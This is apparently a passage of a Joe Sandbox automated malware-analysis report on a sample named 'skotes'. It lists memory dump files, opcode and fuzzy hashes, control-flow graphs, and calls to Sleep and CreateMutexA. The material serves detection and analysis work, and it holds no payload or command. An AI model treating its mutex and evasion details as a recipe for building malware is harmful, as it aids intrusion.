                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782957213.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782980924.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783015660.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783039880.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783069304.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783090791.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783115125.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783143886.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783167634.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783191465.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783265769.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783293021.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783317671.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783340016.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783363276.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783389321.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783412208.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783434522.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783457284.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783484026.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783507403.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783530009.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783555831.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783645404.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783668079.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783692746.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783716826.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783738588.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783764751.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783787888.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783814321.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783837074.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 69e0bc22bd7e432c1f82cc71ad8700ff8723235620a564b7f9d414f7a17bdf9a
                                                                                                                                                                                                                                          • Instruction ID: 12afb3e8c800cc45915f246af77fc59ee37b2d049b6f7db13b68c4ed23b79821
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69e0bc22bd7e432c1f82cc71ad8700ff8723235620a564b7f9d414f7a17bdf9a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88312C316041049BEB48DB78DCC576DB7E2EBC6724F24C299E068D72D1D7359980D712

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 202 b7a682-b7a6a2 206 b7a6a4-b7a6b0 202->206 207 b7a6d0-b7a6ec 202->207 208 b7a6c6-b7a6cd call b8d663 206->208 209 b7a6b2-b7a6c0 206->209 210 b7a6ee-b7a6fa 207->210 211 b7a71a-b7a739 207->211 208->207 209->208 212 b7a949-b7a994 call ba6c6a * 2 Sleep CreateMutexA 209->212 214 b7a710-b7a717 call b8d663 210->214 215 b7a6fc-b7a70a 210->215 216 b7a767-b7a916 call b880c0 211->216 217 b7a73b-b7a747 211->217 234 b7a9a7-b7a9a8 212->234 235 b7a996-b7a998 212->235 214->211 215->212 215->214 222 b7a75d-b7a764 call b8d663 217->222 223 b7a749-b7a757 217->223 222->216 223->212 223->222 235->234 236 b7a99a-b7a9a5 235->236 236->234
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782494384.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782523187.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782617876.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782639343.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782660147.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782682518.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782703230.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782800896.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782823431.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782858566.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782880915.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782957213.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782980924.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783015660.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783039880.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783069304.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783090791.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783115125.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783143886.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783167634.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783191465.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783265769.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783293021.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783317671.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783340016.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783363276.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783389321.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783412208.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783434522.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783457284.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783484026.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783507403.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783530009.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783555831.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783645404.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783668079.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783692746.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783716826.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783738588.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783764751.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783787888.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783814321.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783837074.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 5e8fd5af2674cd71e46211a01d43fc9fab05b2f6225c27dd048dd9884f9f5818
                                                                                                                                                                                                                                          • Instruction ID: fc224b7b6acadafa0f5734deadc483ef6fe00803cdeb2cc0bcd63f6ff186449d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e8fd5af2674cd71e46211a01d43fc9fab05b2f6225c27dd048dd9884f9f5818
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C312A316041049BEB48DB78DCC5B6DBBE2EBC6324F24C2A9E02CD72D1D7359980C752

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 238 b79adc-b79ae8 239 b79afe-b79b27 call b8d663 238->239 240 b79aea-b79af8 238->240 248 b79b55-b79b57 239->248 249 b79b29-b79b35 239->249 240->239 241 b7a917 240->241 244 b7a953-b7a994 Sleep CreateMutexA 241->244 245 b7a917 call ba6c6a 241->245 250 b7a9a7-b7a9a8 244->250 251 b7a996-b7a998 244->251 245->244 254 b79b65-b79d91 call b87a00 call b75c10 call b78b30 call b88220 call b87a00 call b75c10 call b78b30 call b88220 248->254 255 b79b59-b7a916 call b880c0 248->255 252 b79b37-b79b45 249->252 253 b79b4b-b79b52 call b8d663 249->253 251->250 257 b7a99a-b7a9a5 251->257 252->241 252->253 253->248 257->250
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782494384.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782523187.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782617876.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782639343.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782660147.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782682518.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782703230.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782800896.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782823431.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782858566.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782880915.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782957213.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782980924.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783015660.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783039880.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783069304.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783090791.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783115125.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783143886.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783167634.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783191465.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783265769.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783293021.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783317671.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783340016.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783363276.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783389321.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783412208.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783434522.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783457284.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783484026.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783507403.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783530009.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783555831.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783645404.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783668079.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783692746.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783716826.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783738588.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783764751.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783787888.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783814321.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783837074.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: ece0d7db82ec32404eac33ad6236bd8c717497f80decb6fa61b04d65a0058f3e
                                                                                                                                                                                                                                          • Instruction ID: e6ae55fa3529e898a326fe6ca11fbe41a996a243f377016bcc161e6d525116d6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ece0d7db82ec32404eac33ad6236bd8c717497f80decb6fa61b04d65a0058f3e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7213E317042049BEB189B68ECC576CF7E2EBC5310F2482A9E56CD73E5DB759990C712

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 315 b7a856-b7a86e 316 b7a870-b7a87c 315->316 317 b7a89c-b7a89e 315->317 318 b7a892-b7a899 call b8d663 316->318 319 b7a87e-b7a88c 316->319 320 b7a8a0-b7a8a7 317->320 321 b7a8a9-b7a8b1 call b77d30 317->321 318->317 319->318 322 b7a94e-b7a987 call ba6c6a Sleep CreateMutexA 319->322 324 b7a8eb-b7a916 call b880c0 320->324 331 b7a8e4-b7a8e6 321->331 332 b7a8b3-b7a8bb call b77d30 321->332 336 b7a98e-b7a994 322->336 331->324 332->331 337 b7a8bd-b7a8c5 call b77d30 332->337 338 b7a9a7-b7a9a8 336->338 339 b7a996-b7a998 336->339 337->331 343 b7a8c7-b7a8cf call b77d30 337->343 339->338 341 b7a99a-b7a9a5 339->341 341->338 343->331 347 b7a8d1-b7a8d9 call b77d30 343->347 347->331 350 b7a8db-b7a8e2 347->350 350->324
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782494384.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782523187.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782617876.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782639343.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782660147.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782682518.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782703230.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782800896.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782823431.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782858566.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782880915.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782906675.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782957213.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1782980924.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783015660.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783039880.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783069304.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783090791.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783115125.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783143886.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783167634.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783191465.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783265769.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783293021.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783317671.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783340016.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783363276.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783389321.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783412208.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783434522.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783457284.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783484026.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783507403.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783530009.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783555831.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783579002.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783645404.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1783668079.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
